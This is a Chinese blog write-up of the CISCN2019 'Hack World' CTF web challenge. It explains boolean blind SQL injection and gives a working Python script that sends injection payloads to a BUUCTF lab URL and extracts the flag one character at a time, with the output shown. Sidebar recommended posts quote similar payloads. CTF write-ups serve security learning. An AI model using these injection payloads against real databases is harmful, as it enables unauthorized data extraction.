(未完成版)Hack World

已于 2023-04-13 23:28:53 修改
阅读量78 收藏
点赞数 1
文章标签: 安全
于 2023-04-13 23:24:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75178803/article/details/130111174
版权

[CISCN2019 华北赛区 Day2 Web1]Hack World

参考wp有:

BUUCTF:[CISCN2019 华北赛区 Day2 Web1]Hack World_末初mochu7的博客-CSDN博客
BUUCTF__[CISCN2019 华北赛区 Day2 Web1]Hack World_题解_风过江南乱的博客-CSDN博客

[CISCN2019 华北赛区 Day2 Web1]Hack World_沫忆末忆的博客-CSDN博客

https://www.cnblogs.com/upfine/p/16529318.html

  •  fuzz

Fuzz是一种基于黑盒的自动化软件模糊测试技术,简单的说一种懒惰且暴力的技术融合了常见的以及精心构建的数据文本进行网站、软件安全性测试;

【技术分享】MySQL 注入攻击与防御-安全客 - 安全资讯平台

  • 布尔盲注

布尔盲注详解_Gundam-的博客-CSDN博客

  • 用bp fuzz实现sql注入

【CTF】利用 Burpsuite Fuzz 实现 SQL 注入 - 个人文章 - SegmentFault 思否

利用 Burpsuite Fuzz 实现 SQL 注入_hahazaizheli的博客-CSDN博客

  • 安装requests库

Python中如何用命令行的方式安装requests库_命令行安装python的 requests_Matcha_ice_cream的博客-CSDN博客

  • mysql注入语句

输入字符时的boo提示,那这里就得考虑布尔注入

在cmd界面安装requests库的前提下

用python执行脚本得到flag

import requests
import time

url='http://af8eb1d0-2d65-47d5-9144-aa92f3da4771.node4.buuoj.cn:81/index.php'
flag = ''
for i in range(1,43):
    max = 127
    min = 0
    for c in range(0,127):
        n = (int)((max+min)/2)
        payload = '0^(ascii(substr((select(flag)from(flag)),'+str(i)+',1))>'+str(n)+')'
        r = requests.post(url,data = {'id':payload})
        time.sleep(0.005)
        if 'Hello' in str(r.content):
            min=n
        else:
            max=n
        if((max-min)<=1):
            flag+=chr(max)
            print("\r\n", end="")
            print(flag,end='')
            break

执行结果为:

f

fl

fla

flag

flag{

flag{6

flag{6b

flag{6bb

flag{6bbc

flag{6bbc5

flag{6bbc56

flag{6bbc563

flag{6bbc5635

flag{6bbc5635-

flag{6bbc5635-a

flag{6bbc5635-a1

flag{6bbc5635-a11

flag{6bbc5635-a114

flag{6bbc5635-a114-

flag{6bbc5635-a114-4

flag{6bbc5635-a114-41

flag{6bbc5635-a114-41e

flag{6bbc5635-a114-41ee

flag{6bbc5635-a114-41ee-

flag{6bbc5635-a114-41ee-b

flag{6bbc5635-a114-41ee-bc

flag{6bbc5635-a114-41ee-bc6

flag{6bbc5635-a114-41ee-bc63

flag{6bbc5635-a114-41ee-bc63-

flag{6bbc5635-a114-41ee-bc63-f

flag{6bbc5635-a114-41ee-bc63-fe

flag{6bbc5635-a114-41ee-bc63-fe5

flag{6bbc5635-a114-41ee-bc63-fe5a

flag{6bbc5635-a114-41ee-bc63-fe5a2

flag{6bbc5635-a114-41ee-bc63-fe5a26

flag{6bbc5635-a114-41ee-bc63-fe5a263

flag{6bbc5635-a114-41ee-bc63-fe5a2632

flag{6bbc5635-a114-41ee-bc63-fe5a2632c

flag{6bbc5635-a114-41ee-bc63-fe5a2632c5

flag{6bbc5635-a114-41ee-bc63-fe5a2632c5f

flag{6bbc5635-a114-41ee-bc63-fe5a2632c5ff

flag{6bbc5635-a114-41ee-bc63-fe5a2632c5ff}

访白鹿
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[buuctf][CISCN2019 华北赛区 Day2 Web1]Hack World
qq_37301470的博客
11-28 1024
[CISCN2019 华北赛区 Day2 Web1]Hack World 分析 打开环境发现这个 All You Want Is In Table 'flag' and the column is 'flag' 还有个输入框 随便输一个数字1 返回 Hello, glzjin wants a girlfriend. 肯定是sql注入没跑了,而且要查找flag表下的flag字段 由于提交前后url没有变化,所以是通过POST方法提交了参数id。 打开hackbar模拟post过程 发现输入3 or 1=1
hack world
beihai2013
01-21 266
来源:[CISCN2019 华北赛区 Day2 Web1] 链接:https://buuoj.cn/challenges#[CISCN2019%20%E5%8D%8E%E5%8C%97%E8%B5%9B%E5%8C%BA%20Day2%20Web1]Hack%20World 参考:https://ca01h.top/Web_security/ctf_writeup/7.buuctf%E5%88%B7%E9%A2%98%E2%80%94%E2%80%94SQL%E6%B3%A8%E5%85%A5/#CISCN
精通BurpsuiteSQL注入测试的实验操作步骤详解
最新发布
weixin_43822401的博客
05-25 719
在网络安全领域,SQL注入是一种常见的攻击手段,它允许攻击者通过注入恶意SQL代码来操纵后端数据库。Burpsuite作为一款领先的Web安全测试工具,提供了一系列的功能来帮助安全专家发现和防御这类漏洞。本文将详细介绍如何使用Burpsuite进行SQL注入测试的实验操作步骤。通过遵循这些详细的实验操作步骤,安全专家可以更有效地使用Burpsuite进行SQL注入测试。通过本文的指导,读者应该能够掌握使用Burpsuite进行SQL注入测试的关键步骤,提升自己的安全测试能力。
[CISCN2019 华北赛区 Day2 Web1]Hack World
qq_45691294的博客
09-21 4134
打开题目是一个查询的表单,并且明确提示了存在flag表和flag字段,那这里应该考察SQL注入漏洞的利用 抓包提交数据,提交的ID应该就是注入点,接下来测试注入类型和注入方式 提交id=1 和 id=2 id=1 Hello, glzjin wants a girlfriend. id=2 Do you want to be my girlfriend? 当id不同时,查询到的数据也会发生改变,尝试几次输入后发现存在过滤,且注入类型应为盲注 先通过fuzz确定过滤掉了哪些内容 长度为482说明该数据
[CISCN2019]Hack World
m0_46587008的博客
11-29 974
一、Hack World 打开环境:显示“所有你想知道的都在flag表中的flag行中”。所以基本确定是sql注入 二、初探 这个时候我们确定是sql注入,开始对它进行一个初步的测试,判断采取哪种注入方式。 先输入1: 回显。 输入0: 回显不一致。 随后开始尝试报错使用 1’: 返回bool(false),没有报错信息(报错注入不可能了,第一想法是联合注入或盲注) 尝试闭合 1’–+ 或 1’#: 发现有检测,于是Fuzzing测试一下过滤了多少关键词: 发现大部分关键词都不能用,之前想法是盲注和联合
css hack总结 图片整理
09-25
CSS Hack,全称为“CSS Hack技巧”,是一种针对不同浏览器对CSS样式解析差异而采取的解决策略。由于历史原因,尤其是Internet Explorer(IE)的不同本在处理CSS时存在诸多不一致,开发者常常需要使用特定的语法...
Debug hack中文
02-17
Debug hack中文 Linux 调试可用,属于奇门遁甲
IE各hack汇总
02-25
标题与描述:“IE各hack汇总” 在网页开发领域,针对不同浏览器的兼容性问题,开发者经常需要使用“hack”技巧来确保网站在各种浏览器下的表现一致。这里的“hack”特指一种技术手段,用于绕过或利用浏览器的...
google hack database(最新本)
03-07
"google hack database(最新本)"是一个集合了从早期到2019年3月7日所有已知的谷歌黑客语法示例的资源库。 在网络安全领域,了解谷歌黑客技术是至关重要的,因为它可以帮助防御者识别和修复潜在的公开暴露的信息...
动网论坛 v0519(残酷hack)
10-13
《动网论坛 v0519(残酷hack)——深度解析与技术探讨》 动网论坛是一款在互联网上广泛使用的社区论坛软件,其v0519本,被誉为“残酷hack”,在原有功能的基础上进行了多项改进和优化,旨在提升用户交互体验和...
[CISCN2019 华北赛区 Day2 Web1]Hack World 1
feng的博客
10-24 1109
前言 这道题考察的就是SQL注入,其中过滤了一些关键词,自己没做出来的主要原因是对于注入类型的判断还有注入的姿势仍然不够熟练,并不是题目很难。 WP 进入环境后首先我们发现这是一个Post传id的注入,我们要进行注入的表和列都已经给我们了。经过尝试,发现输入1和2的时候存在有意义内容的回显。 再经过一系列的尝试,发现过滤了很多东西,空格也被过滤了。这时候我在判断注入类型那里出现了问题。我以为是字符型注入。 其实我们输入注入id=2/2,会发现回显的是id=1的内容,因此判断为数字型注入。 接下来就是如何注入
【buuctf】hack world wp
m0_55185160的博客
08-16 329
打开网页我们可以得到表名和列名都为flag 在输入框内输入1得到 输入2得到 输入3时 发现报错于是尝试注入 1 union select 1,2 发现受限制我们进行一个fuzz测试 长度为460的都是被过滤的 看了大佬的方法发现这里运用sql三目运算 if(表达式1,表达式2,表达式3)如果表达式1正确,执行表达式2,否则执行表达式3 if(ascil(substr((select(flag)from(flag)),%d,1))>%d,1,2)''%(x,mid) 用大佬的...
[CISCN2019 华北赛区 Day2 Web1]Hack World -wp
freerats的博客
06-27 251
可以在页面上看到提示,flag在flag表flag列里 在查询0,1,2时会获得不同的回显, 0回显:Error Occured When Fetch Result. 1:Hello, glzjin wants a girlfriend 2:Do you want to be my girlfriend? 初步判断0字段应该不存在,1,2存在 尝试输入or时发现被ban,我们可以fuzz一下 长为482的都是不允许的 可以发现select,from,where这些常用注入字符都可以使用 题目过滤了双引号,导
buuctf-web-[CISCN2019 华北赛区 Day2 Web1]Hack World-wp
居上
08-10 314
[CISCN2019 华北赛区 Day2 Web1]Hack World 知识点 fuzz python盲注脚本 过程 fuzz一哈 一个搜索框,搜索框输入1或2会返回结果,其他都返回bool(false)。过滤了union、and、or、空格等 贴上脚本: import requests url = "http://a5a19ec2-3fe1-4f07-9465-f4c861d25093.node4.buuoj.cn:81/index.php" result = "" num = 0 # 用
盲注实战题——Hack World
Marsper的博客
09-26 549
Hack World——布尔盲注 题面如下图 首先在搜索框中输入0,1或2测试显示结果 输入0时的显示结果 输入1时显示如下 输入2时的显示结果如下 继续测试得知输入1和2以外的数字显示结果和0的结果一样 继续测试,输入数字以外的英文测试,显示结果如下 结果发现都显示bool(false)错误 所以判断此题为数字型的bool盲注。 根据上篇介绍过的知识,所以用sql注入语句继续进行测试 输入 if(ascii(substr((select(flag)from(flag)),1,1))=102,1,
利用 Burpsuite Fuzz 实现 SQL 注入
凡宇
07-18 8931
0x01 注入前分析 是个典型的登录框SQL注入题 在源码上还有hint 首先进行注入前的尝试,观察是否有报错情况,或者是有waf: 正常的输入,分2种情况: 用户名正确,显示密码错误password error 用户名错误,显示无此用户no such user! 猜测验证用户名和验证密码是分步进行的,语句如下: select uname from use...
[CISCN2019 华北赛区 Day2 Web1]Hack World(排坑
weixin_45751765的博客
09-28 1360
0x00 前言 惭愧,好像是第一次做盲注题(之前肯定看过,不深入而已…) 直接看了wp进行复现了 根据特定环境适用的攻击手法,熟悉一下script编写 0x01 复现 贴一下源码方便后续理解 <?php $dbuser='root'; $dbpass='root'; function safe($sql){ #被过滤的内容 函数基本没过滤 $blackList = array(' ','||','#','-',';','&','+','or','and','`','"','i
使用HHVM与Hack提升PHP编程效率
"Hack和HHVM是Facebook开发的用于提高其Web服务器性能的两项新技术,旨在提升编程效率且不破坏现有应用程序。这本书由Facebook核心Hack和HHVM团队成员Owen Yamauchi撰写,提供了实践指南,教你如何使用这些经过实战...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值